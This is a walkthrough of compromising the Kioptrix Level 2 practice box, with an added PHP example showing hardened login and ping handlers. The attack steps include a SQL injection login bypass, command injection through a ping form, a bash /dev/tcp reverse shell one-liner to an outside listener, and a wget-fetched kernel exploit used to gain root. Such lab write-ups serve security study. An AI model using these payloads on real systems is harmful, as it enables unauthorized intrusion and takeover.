As usual I first started off with an nmap scan of the box:
root@kali:~# nmap -Pn -n 10.1.1.33
Nmap scan report for 10.1.1.33
Host is up (0.0051s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
3306/tcp open mysql
My first step after seeing port 80 open was to open up a web browser and browse to it.
After a bit of trial and error I found that the login page is vulnerable to SQL
injection, so I entered admin as the username and ' or '1'='1' --
(note the trailing space, which MySQL needs after -- before it treats the rest of the line as a comment) as the password and…
Once logged in I was presented with a page that allowed me to ping other machines
on the network, so to break out of the ping command I tried inserting
a ; after the host (127.0.0.1; ls -lah), which returned a directory
listing along with the ping output.
127.0.0.1; ls -lah
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.056 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.028 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.028/0.038/0.056/0.012 ms, pipe 2
drwxr-xr-x 2 root root 4.0K Oct 8 2009 .
drwxr-xr-x 8 root root 4.0K Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1.7K Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
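Both injections above come down to the same defect: user input is concatenated into a SQL query and into a shell command. The following hardened login check and ping handler are an added example, not the original post's or the box's own index.php/pingit.php; the names ping_host and authenticate, the users table and its password_hash column are assumed.

```php
<?php
// Added example: hardened versions of the two inputs abused on this box.
// Assumed original behaviour: the host field was appended directly to a
// shell command, and the login fields were concatenated into a SQL query.

function ping_host(string $host): string
{
    // Accept only a literal IPv4/IPv6 address. Anything else, including
    // "127.0.0.1; ls -lah", is rejected before a shell is ever involved.
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        return "Invalid host address.\n";
    }
    // escapeshellarg() single-quotes the value, so even a validated string
    // cannot introduce ; or other shell metacharacters.
    $cmd = 'ping -c 3 ' . escapeshellarg($host) . ' 2>&1';
    $output = shell_exec($cmd);
    return is_string($output) ? $output : "ping produced no output.\n";
}

function authenticate(mysqli $db, string $user, string $pass): bool
{
    // Prepared statement: the username travels as a bound parameter, so
    // "' or '1'='1' -- " is compared as a literal string, never parsed as SQL.
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $hash = null;
    $stmt->bind_result($hash);
    $found = $stmt->fetch() === true;
    $stmt->close();
    // The password is checked against a stored hash (assumed to have been
    // created with password_hash()), so it never touches the query at all.
    return $found && is_string($hash) && password_verify($pass, $hash);
}

// Minimal handler for the ping form (field name "ip" is assumed).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['ip'])) {
    header('Content-Type: text/plain');
    echo ping_host((string) $_POST['ip']);
}
```

With this in place the host field only ever reaches ping as a single quoted argument, and the login comparison happens inside PHP rather than inside the SQL text.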
This enabled me to run any commands I liked on the remote machine, so I sent
myself back a shell from it by setting up a listener on my box
with nc -lvp 8080 and then executing
127.0.0.1; bash -i >& /dev/tcp/192.168.1.116/8080 0>&1 from the webpage.
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
With this information, and after a bit more prodding around on the remote machine,
I found a kernel exploit, downloaded
it to the remote box using wget, compiled it, then ran it, which returned
me a root shell.
bash-3.00$ gcc -o root root.c
sh: no job control in this shell
uid=0(root) gid=0(root) groups=48(apache)